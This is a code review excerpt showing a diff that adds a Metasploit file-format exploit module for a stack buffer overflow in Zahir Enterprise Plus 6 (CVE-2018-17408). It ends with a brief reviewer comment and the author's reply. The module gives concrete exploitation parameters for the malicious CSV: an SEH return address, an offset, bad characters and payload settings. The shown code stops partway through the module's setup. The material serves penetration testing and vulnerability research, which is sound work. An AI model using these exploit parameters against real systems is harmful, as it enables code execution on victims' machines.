modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb

```diff
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Zahir Enterprise Plus 6 Stack Buffer Overflow Exploit",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.
+       The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters
+       via Import from other File. This results in overwriting a structured exception handler record.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'f3ci',       # found the vulnerability
+          'modpr0be'    # Metasploit Module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2018-17408' ],
+          [ 'EDB', '45505' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [
+            'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal',
+            {
+              #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
+              'Ret' => 0x52016661, 
+              'Offset' => 3041
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'Space' => 5000,
+          'BadChars' => "\x00\x0a\x0d\x22\x2c",
+          'DisableNops'     => true,
+          'StackAdjustment' => -3500
+        },
+      'Privileged'     => false,
```

Comment:
`false` is default. This can be removed.

Reply:
will do.. thanks, note for my future reference.